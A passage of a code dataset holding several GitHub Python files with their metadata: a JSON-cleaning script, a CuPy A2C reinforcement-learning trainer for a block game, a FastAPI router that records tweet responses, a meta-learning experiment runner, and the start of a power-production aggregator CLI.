list_final.append(dictionary)\r\n return list_final\r\n\r\n# Defining main function \r\ndef main(): \r\n filedata = cleanfile()\r\n finallist =ProcessData(filedata)\r\n #data=dict(finallist)\r\n \r\n with open('Processdata.json', 'w', encoding='utf-8') as f:\r\n json.dump(finallist, f,indent=4)\r\n \r\n \r\n# Using the special variable \r\n# __name__ \r\nif __name__==\"__main__\": \r\n main() \r\n\r\n\r\n\r\n\r\n\r\n", "repo_name": "YadsmiC/Python-Data-cleaning-Json", "sub_path": "Clean Json Python Code.py", "file_name": "Clean Json Python Code.py", "file_ext": "py", "file_size_in_byte": 4859, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "re.search", "line_number": 38, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 137, "usage_type": "call"}]} +{"seq_id": "70931031324", "text": "import cupy as np\n#import tkinter as tk\nimport time\nimport math\nimport random\nimport copy\nfrom collections import OrderedDict\n\n\nfrom neural_net import neuralnet_function as nnf\nfrom neural_net import neuralnet_class as nnc\nfrom environment import block_env as benv\n\n\n\n\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\n\n#numpyの精度\naccuracy = np.float64\n\n\nGAMMA=0.995\nNUM_EPISODES=100000\n\nNUM_PROCESSES=32\nNUM_ADVANCED_STEP = 5\n\nlearning_rate = 0.00001/10\n\n\nclass Adam:\n def __init__(self, lr=0.001, beta1=0.9, beta2=0.999):\n self.lr = lr\n self.beta1 = beta1\n self.beta2 = beta2\n self.iter = 0\n self.m = None\n self.v = None\n\n def update(self, params, grads):\n if self.m is None:\n self.m, self.v = {}, {}\n for key, val in params.items():\n self.m[key] = np.zeros_like(val,accuracy)\n self.v[key] = np.zeros_like(val,accuracy)\n\n self.iter += 1\n lr_t = self.lr * np.sqrt(1.0 - self.beta2**self.iter) / (1.0 - self.beta1**self.iter)\n for key in params.keys():\n self.m[key] += (1 - self.beta1) * (grads[key] - self.m[key])\n self.v[key] += (1 - self.beta2) * (grads[key]**2 - self.v[key])\n params[key] -= lr_t * self.m[key] / (np.sqrt(self.v[key]) + 1e-7)\n\n\nclass RolloutStorage(object):\n def __init__(self, num_steps, num_processes, obs_shape):\n #基本情報\n self.observations = np.zeros((num_steps+1,num_processes,*obs_shape),accuracy)\n self.masks = np.ones((num_steps+1,num_processes, 1),accuracy)\n self.rewards = np.zeros((num_steps,num_processes, 1),accuracy)\n self.actions = np.zeros((num_steps,num_processes, 1),accuracy)\n\n self.returns = np.zeros((num_steps+1,num_processes, 1),accuracy)\n self.dout = np.zeros((num_steps+1,num_processes, 1),accuracy)\n self.index = 0\n\n def save(self, obs, action, reward, mask):\n self.observations[self.index + 1] = copy.copy(obs)\n self.masks[self.index + 1] = copy.copy(mask)\n self.rewards[self.index] = copy.copy(reward)\n self.actions[self.index] = copy.copy(action)\n\n self.index = (self.index + 1)%NUM_ADVANCED_STEP\n\n def after_update(self):\n self.observations[0] = copy.copy(self.observations[-1])\n\n def compute_returns(self, next_value):\n #next_valueのshapeは(num_processes,1)\n self.returns[-1] = next_value\n for ad_step in reversed(range(self.rewards.shape[0])):\n self.returns[ad_step] = self.rewards[ad_step]+GAMMA*self.masks[ad_step + 1]*self.returns[ad_step + 1]\n\n def compute_dout(self):\n self.dout[-1] = 1\n for ad_step in reversed(range(self.rewards.shape[0])):\n self.returns[ad_step] = GAMMA*self.masks[ad_step + 1]*self.dout[ad_step + 1]\n\n\n\n\n\nclass Net():\n def __init__(self,params):\n weight_init_std=0.01\n self.params={}\n self.params['CW1']=params[\"arr_0\"]#weight_init_std*np.random.randn(32,2,8,8)\n self.params['Cb1']=params[\"arr_1\"]#np.ones(32)\n self.params['CW2']=params[\"arr_2\"]#weight_init_std*np.random.randn(64,32,4,4)\n self.params['Cb2']=params[\"arr_3\"]#np.ones(64)\n self.params['CW3']=params[\"arr_4\"]#weight_init_std*np.random.randn(64,64,3,3)\n self.params['Cb3']=params[\"arr_5\"]#np.ones(64)\n\n self.params['W1']=params[\"arr_6\"]#weight_init_std*np.random.randn(5184,512)/np.sqrt(5184/2)\n self.params['b1']=params[\"arr_7\"]#np.zeros(512)\n\n self.params['W_critic']=params[\"arr_8\"]#weight_init_std*np.random.randn(512,1)/np.sqrt(512/2)\n self.params['b_critic']=params[\"arr_9\"]#np.zeros(1)\n\n self.params['W_actor']=params[\"arr_10\"]#weight_init_std*np.random.randn(512,3)/np.sqrt(512/2)\n self.params['b_actor']=params[\"arr_11\"]#np.zeros(3)\n\n self.layers=OrderedDict()\n self.layers[\"Convolution1\"]=nnc.Convolution(self.params['CW1'],self.params['Cb1'],stride=4)\n self.layers['Relu1']=nnc.Relu()\n self.layers[\"Convolution2\"]=nnc.Convolution(self.params['CW2'],self.params['Cb2'],stride=2)\n self.layers['Relu2']=nnc.Relu()\n self.layers[\"Convolution3\"]=nnc.Convolution(self.params['CW3'],self.params['Cb3'],stride=1)\n self.layers['Relu3']=nnc.Relu()\n self.layers[\"Connect\"]=nnc.Connection()\n\n self.layers['Affine1']=nnc.Affine(self.params['W1'],self.params['b1'])\n\n self.layer_Affine_critic = nnc.Affine(self.params['W_critic'],self.params['b_critic'])\n self.layer_Affine_actor = nnc.Affine(self.params['W_actor'],self.params['b_actor'])\n\n\n\n\n def forward(self, x):\n for layer in self.layers.values():\n x = layer.forward(x)\n\n critic_output = self.layer_Affine_critic.forward(x)\n actor_output = self.layer_Affine_actor.forward(x)\n\n return critic_output, actor_output\n\n def gradient(self, dout_critic, dout_actor):\n\n dout_critic = self.layer_Affine_critic.backward(dout_critic)\n dout_actor = self.layer_Affine_actor.backward(dout_actor)\n dout = dout_actor + dout_critic\n layers=list(self.layers.values())\n layers.reverse()\n for layer in layers:\n dout=layer.backward(dout)\n self.grads={}\n self.grads['CW1']=self.layers['Convolution1'].dW\n self.grads['Cb1']=self.layers['Convolution1'].db\n self.grads['CW2']=self.layers['Convolution2'].dW\n self.grads['Cb2']=self.layers['Convolution2'].db\n self.grads['CW3']=self.layers['Convolution3'].dW\n self.grads['Cb3']=self.layers['Convolution3'].db\n\n self.grads['W1']=self.layers['Affine1'].dW\n self.grads['b1']=self.layers['Affine1'].db\n\n self.grads['W_critic']=self.layer_Affine_critic.dW\n self.grads['b_critic']=self.layer_Affine_critic.db\n\n self.grads['W_actor']=self.layer_Affine_actor.dW\n self.grads['b_actor']=self.layer_Affine_actor.db\n\n\n def get_action(self, x):\n #x=array(num_processes,*obs_shape)\n _, actor_output = self.forward(x)\n #出力値は(num_processes,3)\n #actor_output.size()はtorch.size([1,3]),actionとvalueは(1,1),torch.size([1,1])\n prob = nnf.softmax(actor_output)\n #print(prob)\n action =np.array([ np.random.choice(a=[0,1,2],size= 1, p = prob[i]) for i in range(x.shape[0])],accuracy)\n #actionは(NUM_PROCESSES,1)で出力\n return action.reshape(-1,1)\n\n\n def get_value(self,x):\n value, _ = self.forward(x)\n return value.reshape(-1,1)\n\n\n def evaluate_actions(self, x, actions):\n value, actor_output = self.forward(x)\n\n probs = nnf.softmax(actor_output) # (step*num_processes,3)\n #print(\"test1\")\n #print(probs)\n action_probs = np.array( [probs[i][int(actions[i])] for i in range(actions.shape[0])] ,accuracy).reshape(-1,1) # (~,1)\n #print(\"test2\")\n #print(action_probs)\n action_log_probs= np.log(action_probs+1e-7)# (~,1)\n self.probs = probs\n #print(\"test3\")\n entropy = -np.sum(np.log(probs+1e-7)*probs)/probs.shape[0]\n #print(\"test4\")\n return value, action_log_probs, entropy\n\n\n\nclass Brain(object):\n def __init__(self, actor_critic):\n self.actor_critic = actor_critic\n self.optimizer = Adam(lr = learning_rate)\n\n def update(self, rollouts):\n obs_shape = rollouts.observations.shape[2:]\n num_steps = NUM_ADVANCED_STEP\n num_processes = NUM_PROCESSES\n\n values, action_log_probs, entropy = self.actor_critic.evaluate_actions(\n rollouts.observations[:-1].reshape(-1,2,100,100),\n rollouts.actions.reshape(-1,1) #(num_step*num_processes,1)\n )\n\n\n\n values = values.reshape(num_steps,num_processes, 1)\n action_log_probs = action_log_probs.reshape(num_steps,num_processes, 1)\n advantages = rollouts.returns[:-1]-values\n value_loss = np.mean(advantages**2)\n action_gain = np.mean(action_log_probs*advantages)\n total_loss = 0.5*value_loss-action_gain-0.01*entropy\n\n #逆伝搬の計算\n probs = self.actor_critic.probs #(step*process,3)\n\n tmp = np.zeros_like(probs,accuracy)\n act = rollouts.actions.reshape(-1,1)\n for i in range(num_steps*num_processes):\n tmp[i][int(act[i])]=(rollouts.returns[:-1].reshape(-1,1)-values.reshape(-1,1))[i][0]/(num_processes*num_steps)\n\n #dout_Jの計算\n dout_J = tmp*probs-(np.sum(tmp*probs,axis = -1).reshape(-1,1))*probs\n #dout_Entropyの計算\n entropy_sec = np.sum(probs*np.log(probs), axis =1).reshape(-1,1)\n dout_entropy = (probs*np.log(probs)-probs*entropy_sec)/(num_steps*num_processes)\n #dout_actorの計算\n dout_actor = -0.01*dout_entropy-dout_J\n\n\n rollouts.compute_dout()\n dout_value_loss = 2*advantages*(rollouts.dout[:-1]-1)/(num_steps*num_processes)\n dout_action_gain = action_log_probs*(rollouts.dout[:-1]-1)/(num_steps*num_processes)\n dout_critic = 0.5*dout_value_loss-dout_action_gain\n\n self.actor_critic.gradient(dout_critic = dout_critic.reshape(num_steps*num_processes,1),\n dout_actor = dout_actor.reshape(num_steps*num_processes,3))\n params = self.actor_critic.params\n grads = self.actor_critic.grads\n self.optimizer.update(params, grads)\n\n\n\nclass Environment:\n def __init__(self,save_flag = False, path = \"./trained_params.npz\"):\n self.save_flag = save_flag\n print(\"============ Load parameters ============\")\n self.params = np.load(path)\n self.actor_critic = Net(self.params)\n def run(self):\n envs = [benv.Env() for i in range(NUM_PROCESSES)]\n n_in= (2,100,100)\n n_plot_in = (1,100,100)\n brain = Brain(self.actor_critic)\n\n #状態のサイズ\n obs_np = np.zeros([NUM_PROCESSES,*n_in],accuracy)\n obs_plot_np = np.zeros([NUM_PROCESSES,*n_plot_in],accuracy)\n\n #基本情報のリスト\n current_obs = np.zeros((NUM_PROCESSES,*n_in),accuracy)\n rollouts = RolloutStorage(NUM_ADVANCED_STEP,NUM_PROCESSES,n_in)\n episode_rewards = np.zeros([NUM_PROCESSES,1],accuracy)\n final_rewards = np.zeros([NUM_PROCESSES,1],accuracy)\n\n\n reward_np = np.zeros([NUM_PROCESSES,1],accuracy)\n done_np = np.zeros([NUM_PROCESSES,1],accuracy)\n each_step = [ 0 for _ in range(NUM_PROCESSES)]\n\n #状態の初期化\n obs = [env.reset() for env in envs]\n obs = np.array(obs,accuracy)\n current_obs = obs #(NUM_PROCESSES, 2, 100, 100)\n\n noop = np.random.randint(0,30,(NUM_PROCESSES,1)).astype(accuracy)\n\n elapsed_episode = [ 0 for _ in range(NUM_PROCESSES)]\n life_max = 1\n life = [ life_max for _ in range(NUM_PROCESSES)]\n\n total_deleted_blocks = [ 0 for i in range(NUM_PROCESSES)]\n\n #これはcall-backの為の変数。\n tmp_num_blocks = [ envs[i].block_num for i in range(NUM_PROCESSES)]\n tmp_inverse_loss = 0\n tmp_inverse_loss_index = 0\n\n for j in range(NUM_EPISODES):\n for step in range(NUM_ADVANCED_STEP):\n #並列環境が多い時はコメントアウト外すと進捗が見られます。\n #print((j,step))\n #actionの取得\n #with torch.no_grad():\n actions = self.actor_critic.get_action(rollouts.observations[step]) #(NUM_PROCESSES,1)のベクトル\n #No-operationの設定\n for i in range(NUM_PROCESSES):\n if each_step[i]<=noop[i]:\n actions[i] = np.array([1],accuracy)\n #メインプロセスのステップ実行\n #print(envs[i].step(2*(actions.tolist()[i][0]-1)/envs[i].scale)[0].shape)\n #print(obs_np[i].shape)\n obs_np[i], done_np[i],_= envs[i].step(2*(actions.tolist()[i][0]-1)/envs[i].scale)\n\n\n\n #ボールが地面に着いた場合\n if done_np[i]:\n total_deleted_blocks[i] += tmp_num_blocks[i]-len(envs[i].lst)\n life[i] -= 1\n if i == 0:\n print(f'episode : {elapsed_episode[i]:04} | current step : {int(each_step[i]):04} | life : {life[i]+1} | deleted blocks : {envs[i].block_num-len(envs[i].lst):02} |',\\\n f' all env\\'s average deleted blocks : {int(sum([10*total_deleted_blocks[i]/(elapsed_episode[i]+1) for i in range(NUM_PROCESSES)])/NUM_PROCESSES)/10}')\n print([int(10*total_deleted_blocks[i]/(elapsed_episode[i]+1))/10 for i in range(NUM_PROCESSES)])\n print(\"===================================================================================================================\")\n if elapsed_episode[i]%10 == 0 and elapsed_episode[i] != 0:\n print(\"+++++++++++ save parameters +++++++++++++\")\n np.savez(\"./trained_params\",\n env.actor_critic.params[\"CW1\"].astype(accuracy),\n env.actor_critic.params[\"Cb1\"].astype(accuracy),\n env.actor_critic.params[\"CW2\"].astype(accuracy),\n env.actor_critic.params[\"Cb2\"].astype(accuracy),\n env.actor_critic.params[\"CW3\"].astype(accuracy),\n env.actor_critic.params[\"Cb3\"].astype(accuracy),\n env.actor_critic.params[\"W1\"].astype(accuracy),\n env.actor_critic.params[\"b1\"].astype(accuracy),\n env.actor_critic.params[\"W_critic\"].astype(accuracy),\n env.actor_critic.params[\"b_critic\"].astype(accuracy),\n env.actor_critic.params[\"W_actor\"].astype(accuracy),\n env.actor_critic.params[\"b_actor\"].astype(accuracy))\n\n if tmp_num_blocks[i] == 0:\n reward_np[i] = 0\n else:\n reward_np[i] = np.array([(tmp_num_blocks[i]-len(envs[i].lst))/tmp_num_blocks[i] ],accuracy)\n\n each_step[i] = 0\n if life[i] >= 1:\n tmp_num_blocks[i] = len(envs[i].lst)\n obs_np[i] = envs[i].reset_tmp(envs[i].lst,envs[i].tmp)\n else:\n tmp_num_blocks[i] = envs[i].block_num\n life[i]=life_max\n obs_np[i] = envs[i].reset()\n noop[i] = random.randint(0,30)\n elapsed_episode[i]+=1\n\n #問題なくステップが進んだ場合\n else:\n if envs[i].mouse_x < 10 or 90 < envs[i].mouse_x:\n if envs[i].ref_n==0:\n reward_np[i] = -0.0005\n else:\n reward_np[i] = 1./NUM_PROCESSES\n else:\n if envs[i].ref_n==0:\n reward_np[i] = 0.\n else:\n reward_np[i] = 1./NUM_PROCESSES\n each_step[i] += 1\n\n #更新の準備\n reward = reward_np\n episode_rewards += reward\n\n masks = np.array([[0.] if done_ else [1.] for done_ in done_np],accuracy)\n final_rewards *= masks\n final_rewards += (1-masks)*episode_rewards\n episode_rewards *= masks\n\n obs = obs_np\n current_obs = obs\n #全てTensor\n rollouts.save(current_obs, actions, reward, masks)\n #Advanced-step終了後の更新\n #with torch.no_grad():\n next_value = self.actor_critic.get_value(rollouts.observations[-1])\n rollouts.compute_returns(next_value)\n brain.update(rollouts)\n rollouts.after_update() #更新\n\n \"\"\"\n #test######################################################################################################################################\n if tmp_inverse_loss <= int(sum([10*full_total_ref[i]/(elapsed_episode[i]+1) for i in range(NUM_PROCESSES)])/NUM_PROCESSES)/10:\n tmp_inverse_loss = int(sum([10*full_total_ref[i]/(elapsed_episode[i]+1) for i in range(NUM_PROCESSES)])/NUM_PROCESSES)/10\n tmp_inverse_loss_index = 0\n elif tmp_inverse_loss_index < 100:\n tmp_inverse_loss_index+=1\n else:\n tmp_inverse_loss_index = 0\n learning_rate/=2\n ###########################################################################################################################################\n \"\"\"\n if np.average(elapsed_episode) >= 200+1:\n print(\"Finish : \",int(sum([10*total_deleted_blocks[i]/(elapsed_episode[i]+1) for i in range(NUM_PROCESSES)])/NUM_PROCESSES)/10)\n break\n #test\n return int(sum([10*total_deleted_blocks[i]/(elapsed_episode[i]+1) for i in range(NUM_PROCESSES)])/NUM_PROCESSES)/10\n\n\n\n\n\n\nfull_results = []\nresults = []\ntmp_max=0\nwith open(\"./model_best.txt\",\"r\") as f:\n tmp_max = float(f.read())\n\nfor seq in range(100):\n path = \"./trained_params.npz\"\n print(\"number [\",seq, \"] loop started\")\n\n for loop in range(1000):\n flag = False\n print(\"Now is \",seq,\"-\",loop,\"time's loop : current best score is \",tmp_max)\n env=Environment(save_flag = flag, path = path)\n ave = env.run()\n results.append(ave)\n\n if tmp_max <= ave:\n print(\"maximum value of average is updated : \",ave)\n tmp_max = ave\n with open(\"./model_best.txt\",\"w\") as f:\n f.write(str(f'{tmp_max}'))\n\n else:\n print(\"maximum value of average is not updated : \",tmp_max)\n\n print(\"+++++++++++ save parameters +++++++++++++\")\n np.savez(\"./trained_params\",\n env.actor_critic.params[\"CW1\"].astype(accuracy),\n env.actor_critic.params[\"Cb1\"].astype(accuracy),\n env.actor_critic.params[\"CW2\"].astype(accuracy),\n env.actor_critic.params[\"Cb2\"].astype(accuracy),\n env.actor_critic.params[\"CW3\"].astype(accuracy),\n env.actor_critic.params[\"Cb3\"].astype(accuracy),\n env.actor_critic.params[\"W1\"].astype(accuracy),\n env.actor_critic.params[\"b1\"].astype(accuracy),\n env.actor_critic.params[\"W_critic\"].astype(accuracy),\n env.actor_critic.params[\"b_critic\"].astype(accuracy),\n env.actor_critic.params[\"W_actor\"].astype(accuracy),\n env.actor_critic.params[\"b_actor\"].astype(accuracy))\n\n path = \"./trained_params.npz\"\n del env\n full_results.append(sum(results)/len(results))\n", "repo_name": "asahi-kojima/DQL", "sub_path": "main_process_full_original_multi_envA2C_7.py", "file_name": "main_process_full_original_multi_envA2C_7.py", "file_ext": "py", "file_size_in_byte": 19490, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "cupy.float64", "line_number": 21, "usage_type": "attribute"}, {"api_name": "cupy.zeros_like", "line_number": 46, "usage_type": "call"}, {"api_name": "cupy.zeros_like", "line_number": 47, "usage_type": "call"}, {"api_name": "cupy.sqrt", "line_number": 50, "usage_type": "call"}, {"api_name": "cupy.sqrt", "line_number": 54, "usage_type": "call"}, {"api_name": "cupy.zeros", "line_number": 60, "usage_type": "call"}, {"api_name": "cupy.ones", "line_number": 61, "usage_type": "call"}, {"api_name": "cupy.zeros", "line_number": 62, "usage_type": "call"}, {"api_name": "cupy.zeros", "line_number": 63, "usage_type": "call"}, {"api_name": "cupy.zeros", "line_number": 65, "usage_type": "call"}, {"api_name": "cupy.zeros", "line_number": 66, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 70, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 71, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 72, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 73, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 78, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 115, "usage_type": "call"}, {"api_name": "neural_net.neuralnet_class.Convolution", "line_number": 116, "usage_type": "call"}, {"api_name": "neural_net.neuralnet_class", "line_number": 116, "usage_type": "name"}, {"api_name": "neural_net.neuralnet_class.Relu", "line_number": 117, "usage_type": "call"}, {"api_name": "neural_net.neuralnet_class", "line_number": 117, "usage_type": "name"}, {"api_name": "neural_net.neuralnet_class.Convolution", "line_number": 118, "usage_type": "call"}, {"api_name": "neural_net.neuralnet_class", "line_number": 118, "usage_type": "name"}, {"api_name": "neural_net.neuralnet_class.Relu", "line_number": 119, "usage_type": "call"}, {"api_name": "neural_net.neuralnet_class", "line_number": 119, "usage_type": "name"}, {"api_name": "neural_net.neuralnet_class.Convolution", "line_number": 120, "usage_type": "call"}, {"api_name": "neural_net.neuralnet_class", "line_number": 120, "usage_type": "name"}, {"api_name": "neural_net.neuralnet_class.Relu", "line_number": 121, "usage_type": "call"}, {"api_name": "neural_net.neuralnet_class", "line_number": 121, "usage_type": "name"}, {"api_name": "neural_net.neuralnet_class.Connection", "line_number": 122, "usage_type": "call"}, {"api_name": "neural_net.neuralnet_class", "line_number": 122, "usage_type": "name"}, {"api_name": "neural_net.neuralnet_class.Affine", "line_number": 124, "usage_type": "call"}, {"api_name": "neural_net.neuralnet_class", "line_number": 124, "usage_type": "name"}, {"api_name": "neural_net.neuralnet_class.Affine", "line_number": 126, "usage_type": "call"}, {"api_name": "neural_net.neuralnet_class", "line_number": 126, "usage_type": "name"}, {"api_name": "neural_net.neuralnet_class.Affine", "line_number": 127, "usage_type": "call"}, {"api_name": "neural_net.neuralnet_class", "line_number": 127, "usage_type": "name"}, {"api_name": "neural_net.neuralnet_function.softmax", "line_number": 173, "usage_type": "call"}, {"api_name": "neural_net.neuralnet_function", "line_number": 173, "usage_type": "name"}, {"api_name": "cupy.array", "line_number": 175, "usage_type": "call"}, {"api_name": "cupy.random.choice", "line_number": 175, "usage_type": "call"}, {"api_name": "cupy.random", "line_number": 175, "usage_type": "attribute"}, {"api_name": "neural_net.neuralnet_function.softmax", "line_number": 188, "usage_type": "call"}, {"api_name": "neural_net.neuralnet_function", "line_number": 188, "usage_type": "name"}, {"api_name": "cupy.array", "line_number": 191, "usage_type": "call"}, {"api_name": "cupy.log", "line_number": 194, "usage_type": "call"}, {"api_name": "cupy.sum", "line_number": 197, "usage_type": "call"}, {"api_name": "cupy.log", "line_number": 197, "usage_type": "call"}, {"api_name": "cupy.mean", "line_number": 223, "usage_type": "call"}, {"api_name": "cupy.mean", "line_number": 224, "usage_type": "call"}, {"api_name": "cupy.zeros_like", "line_number": 230, "usage_type": "call"}, {"api_name": "cupy.sum", "line_number": 236, "usage_type": "call"}, {"api_name": "cupy.sum", "line_number": 238, "usage_type": "call"}, {"api_name": "cupy.log", "line_number": 238, "usage_type": "call"}, {"api_name": "cupy.log", "line_number": 239, "usage_type": "call"}, {"api_name": "cupy.load", "line_number": 261, "usage_type": "call"}, {"api_name": "environment.block_env.Env", "line_number": 264, "usage_type": "call"}, {"api_name": "environment.block_env", "line_number": 264, "usage_type": "name"}, {"api_name": "cupy.zeros", "line_number": 270, "usage_type": "call"}, {"api_name": "cupy.zeros", "line_number": 271, "usage_type": "call"}, {"api_name": "cupy.zeros", "line_number": 274, "usage_type": "call"}, {"api_name": "cupy.zeros", "line_number": 276, "usage_type": "call"}, {"api_name": "cupy.zeros", "line_number": 277, "usage_type": "call"}, {"api_name": "cupy.zeros", "line_number": 280, "usage_type": "call"}, {"api_name": "cupy.zeros", "line_number": 281, "usage_type": "call"}, {"api_name": "cupy.array", "line_number": 286, "usage_type": "call"}, {"api_name": "cupy.random.randint", "line_number": 289, "usage_type": "call"}, {"api_name": "cupy.random", "line_number": 289, "usage_type": "attribute"}, {"api_name": "cupy.array", "line_number": 312, "usage_type": "call"}, {"api_name": "cupy.savez", "line_number": 331, "usage_type": "call"}, {"api_name": "cupy.array", "line_number": 348, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 358, "usage_type": "call"}, {"api_name": "cupy.array", "line_number": 379, "usage_type": "call"}, {"api_name": "cupy.average", "line_number": 407, "usage_type": "call"}, {"api_name": "cupy.savez", "line_number": 445, "usage_type": "call"}]} +{"seq_id": "27137768650", "text": "from fastapi import APIRouter, HTTPException\n\nfrom ..database.load_companies_tweets import load_data\nfrom ..database.responses import load_respones, save_responses\nfrom ..internal.responses import RecordResponse\n\nrouter = APIRouter()\n\nfrom .round_robin import companies, tweet_pairs, correct_tweets, incorrect_tweets\n\n@router.post(\"/responses\")\nasync def record_response(response: RecordResponse):\n responses = response.response\n\n responses_db = load_respones()\n\n try:\n\n for resp in responses:\n company_id = resp[\"company_id\"]\n\n if not correct_tweets[company_id].get(resp[\"tweet_id\"], False) and not incorrect_tweets[company_id].get(resp[\"tweet_id\"], False):\n raise HTTPException(status_code=404, detail=\"Company with ID not found\")\n\n if correct_tweets[company_id].get(resp[\"tweet_id\"], False):\n tweet = dict(correct_tweets[company_id].get(resp[\"tweet_id\"], False))\n tweet[\"date\"] = str(tweet[\"date\"])\n \n if incorrect_tweets[company_id].get(resp[\"tweet_id\"], False):\n tweet = dict(incorrect_tweets[company_id].get(resp[\"tweet_id\"], False))\n tweet[\"date\"] = str(tweet[\"date\"])\n\n responses_db.append({\n \"twitter_handle\": resp[\"twitterHandle\"],\n \"company_id\": resp[\"company_id\"],\n \"tweet\": tweet,\n \"action\": resp[\"action\"],\n })\n save_responses(responses_db)\n\n return 204\n except KeyError:\n raise HTTPException(status_code=500, detail=\"Something went wrong\")\n \n", "repo_name": "GUH-2022-LWSN/GUH-IDEA", "sub_path": "app/routers/responses.py", "file_name": "responses.py", "file_ext": "py", "file_size_in_byte": 1616, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "fastapi.APIRouter", "line_number": 7, "usage_type": "call"}, {"api_name": "internal.responses.RecordResponse", "line_number": 12, "usage_type": "name"}, {"api_name": "database.responses.load_respones", "line_number": 15, "usage_type": "call"}, {"api_name": "round_robin.correct_tweets", "line_number": 22, "usage_type": "name"}, {"api_name": "round_robin.incorrect_tweets", "line_number": 22, "usage_type": "name"}, {"api_name": "fastapi.HTTPException", "line_number": 23, "usage_type": "call"}, {"api_name": "round_robin.correct_tweets", "line_number": 25, "usage_type": "name"}, {"api_name": "round_robin.correct_tweets", "line_number": 26, "usage_type": "name"}, {"api_name": "round_robin.incorrect_tweets", "line_number": 29, "usage_type": "name"}, {"api_name": "round_robin.incorrect_tweets", "line_number": 30, "usage_type": "name"}, {"api_name": "database.responses.save_responses", "line_number": 39, "usage_type": "call"}, {"api_name": "fastapi.HTTPException", "line_number": 43, "usage_type": "call"}]} +{"seq_id": "39654822910", "text": "\"\"\"Run experiments\n\nMain experimental pipeline, including:\n- download base datasets\n- calculate meta-datasets\n- train and evaluate meta-models\n- determine meta-feature importance\n- aggregate evaluation metrics, create tables and some plots\n\nUsage: python -m metalfi.src.run_experiments --help\n\"\"\"\nimport argparse\nimport os\n\nfrom metalfi.src.controller import Controller\nimport metalfi.src.memory as memory\nfrom metalfi.src.parameters import Parameters\n\n\n# \"delete_inputs\": Whether to delete base datasets and meta-datasets.\n# \"delete_outputs\": Whether to delete meta-models and results.\ndef run_experiments(delete_inputs: bool = False, delete_outputs: bool = False):\n if delete_inputs:\n memory.clear_directories([Parameters.base_dataset_dir, Parameters.meta_dataset_dir,\n Parameters.output_dir + \"meta_computation_time\"])\n if delete_outputs:\n directories = [\"meta_feature_importance\", \"meta_prediction_performance\", \"feature_selection_performance\"]\n directories = [Parameters.output_dir + x for x in directories]\n directories.append(Parameters.meta_model_dir)\n memory.clear_directories(directories)\n\n c = Controller() # download base datasets, creates meta-datasets\n c.train_meta_models()\n c.meta_feature_importances()\n c.estimate([x for x in os.listdir(Parameters.meta_model_dir) if x != \".gitignore\"])\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Runs the experimental pipeline.',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('--delete_inputs', type=bool, default=False,\n help='Delete all base datasets and meta-dataset from previous runs first.')\n parser.add_argument('--delete_outputs', type=bool, default=False,\n help='Delete all meta-models and results from previous runs first.')\n print('Experimental pipeline started.')\n run_experiments(**vars(parser.parse_args()))\n print('Experimental pipeline executed successfully.')\n", "repo_name": "CemOezcan/metalfi", "sub_path": "metalfi/src/run_experiments.py", "file_name": "run_experiments.py", "file_ext": "py", "file_size_in_byte": 2080, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "metalfi.src.memory.clear_directories", "line_number": 24, "usage_type": "call"}, {"api_name": "metalfi.src.memory", "line_number": 24, "usage_type": "name"}, {"api_name": "metalfi.src.parameters.Parameters.base_dataset_dir", "line_number": 24, "usage_type": "attribute"}, {"api_name": "metalfi.src.parameters.Parameters", "line_number": 24, "usage_type": "name"}, {"api_name": "metalfi.src.parameters.Parameters.meta_dataset_dir", "line_number": 24, "usage_type": "attribute"}, {"api_name": "metalfi.src.parameters.Parameters.output_dir", "line_number": 25, "usage_type": "attribute"}, {"api_name": "metalfi.src.parameters.Parameters", "line_number": 25, "usage_type": "name"}, {"api_name": "metalfi.src.parameters.Parameters.output_dir", "line_number": 28, "usage_type": "attribute"}, {"api_name": "metalfi.src.parameters.Parameters", "line_number": 28, "usage_type": "name"}, {"api_name": "metalfi.src.parameters.Parameters.meta_model_dir", "line_number": 29, "usage_type": "attribute"}, {"api_name": "metalfi.src.parameters.Parameters", "line_number": 29, "usage_type": "name"}, {"api_name": "metalfi.src.memory.clear_directories", "line_number": 30, "usage_type": "call"}, {"api_name": "metalfi.src.memory", "line_number": 30, "usage_type": "name"}, {"api_name": "metalfi.src.controller.Controller", "line_number": 32, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 35, "usage_type": "call"}, {"api_name": "metalfi.src.parameters.Parameters.meta_model_dir", "line_number": 35, "usage_type": "attribute"}, {"api_name": "metalfi.src.parameters.Parameters", "line_number": 35, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 39, "usage_type": "call"}, {"api_name": "argparse.ArgumentDefaultsHelpFormatter", "line_number": 40, "usage_type": "attribute"}]} +{"seq_id": "847540605", "text": "# -*- coding: utf-8 -*-\n\nimport logging\nfrom argparse import ArgumentParser\nfrom yaml import safe_load\n\nfrom docl.power_aggregator.retriever import get_productions\n\nfrom docl.power_aggregator.cleaner import clean_raw_productions\n\nfrom docl.power_aggregator.exporter import export\n\nfrom docl.power_aggregator.aggregator import synchronize_productions, check_synchronized_productions, aggregate_productions\n\nfrom docl.power_aggregator.utils.check import check_params, check_config\n\nCONFIG_PATH = \"config.yml\"\n\ndef main():\n\n logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\n logger = logging.getLogger(\"docl.power_aggregator\")\n\n logger.info(\"Start\")\n\n parser = ArgumentParser(description=\"Process end to end test on DWIB\")\n parser.add_argument('--from', required=True, help='beggining of period DD-MM-YYYY')\n parser.add_argument('--to', required=True, help='end of period DD-MM-YYYY')\n 